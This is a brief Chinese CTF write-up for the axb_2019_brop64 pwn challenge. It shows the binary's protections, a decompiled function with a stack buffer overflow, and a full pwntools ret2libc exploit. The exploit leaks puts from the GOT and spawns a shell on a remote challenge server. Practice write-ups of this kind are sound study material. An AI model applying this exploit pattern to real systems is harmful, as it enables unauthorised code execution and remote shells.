axb_2019_brop64

axb_2019_brop64

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
1
2
3
4
5

64位，只开了NX

__int64 repeater()
{
  size_t v1; // rax
  char s[208]; // [rsp+0h] [rbp-D0h] BYREF

  printf("Please tell me:");
  memset(s, 0, 0xC8uLL);
  read(0, s, 0x400uLL);
  if ( !strcmp(s, "If there is a chance,I won't make any mistake!\n") )
  {
    puts("Wish you happy everyday!");
  }
  else
  {
    printf("Repeater:");
    v1 = strlen(s);
    write(1, s, v1);
  }
  return 0LL;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

程序很简单，有一点点花里胡哨，看到栈溢出，看一下有没有坑点（x

思路

ret2libc，打的puts，

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",26296,"./pwn",10)
context(os='linux', arch='amd64',log_level='debug')
libc=ELF('libc-2.23.so')

rdi=0x0000000000400963
pl=cyclic(0xd8)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x400845)
sla('me',pl)
leak=get_addr_u64()-libc.sym['puts']
li(leak)
sys=system(leak)
sh=shell(leak)
pl=cyclic(0xd8)+p64(rdi)+p64(sh)+p64(sys)
sla('me',pl)

ia(c)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17